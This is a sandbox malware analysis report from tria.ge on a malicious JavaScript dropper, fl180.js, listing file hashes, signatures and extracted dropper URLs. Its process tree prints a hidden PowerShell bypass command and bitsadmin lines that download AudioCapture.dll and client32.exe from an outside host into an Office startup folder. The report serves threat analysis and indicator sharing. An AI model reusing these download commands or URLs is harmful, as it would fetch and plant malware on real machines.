Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

fl180.js

windows7-x64

10

fl180.js

windows10-2004-x64

10

Analysis

  • max time kernel
    45s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    08/07/2023, 08:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fl180.js

  • Size

    45KB

  • MD5

    de3d0a48c7a6b6552922f4e88c55bf83

  • SHA1

    2647c35cd861b225df8a6b34cb33724fce914a03

  • SHA256

    d720c060a4057004961c8af319f08d30b286cd3639d0fc0429c26c3d7319991a

  • SHA512

    1edb43bfdc0d682343994169c762465080c700dfa78d581ba864755c884eb9002112b25e906033c9e5b2d7194dfa53e22457cc6047c390a0cc03db68ec50b928

  • SSDEEP

    768:JxyIPOhAwthDONQD2jjAHYH3GQuhKYNfHavg90dSDorycM8L:Jx0AwTDOC2j8W3GQuhKYNf6vgydko2cB

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://turvavalaisin.fi/loco.zip
exe.dropper

https://turvavalaisin.fi/files/

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 2 IoCs
    dropper
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\fl180.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\rjribr2.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2404
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://turvavalaisin.fi/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2100
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://turvavalaisin.fi/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
        3⤵
        • Download via BitsAdmin
        PID:812

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\rjribr2.ps1
    Filesize

    1KB

    MD5

    9cf347f03513bd9be1a3244435aa0c2f

    SHA1

    4993c7374edcf81180753534cf03ff07648c140b

    SHA256

    9021259bb4d1de30103c74ab7da2ee868f3223a4dcaa9ffaa795b5a4b6b26812

    SHA512

    ce267d8dfb48dbc80457a20fede0b5f728579677c82b6cf8321ac4fcee0062a1c2049ca47ec3a01e8c9e2a442a28caaf2471fc1bf630ecf62b98950f1deb90c3

    Download Submit

  • memory/2404-60-0x000000001B290000-0x000000001B572000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2404-61-0x0000000002360000-0x0000000002368000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2404-63-0x0000000002730000-0x00000000027B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2404-62-0x0000000002730000-0x00000000027B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2404-65-0x0000000002730000-0x00000000027B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2404-66-0x0000000002730000-0x00000000027B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2404-67-0x0000000002730000-0x00000000027B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2404-68-0x0000000002730000-0x00000000027B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2404-69-0x0000000002730000-0x00000000027B0000-memory.dmp

    Filesize

    512KB

    Download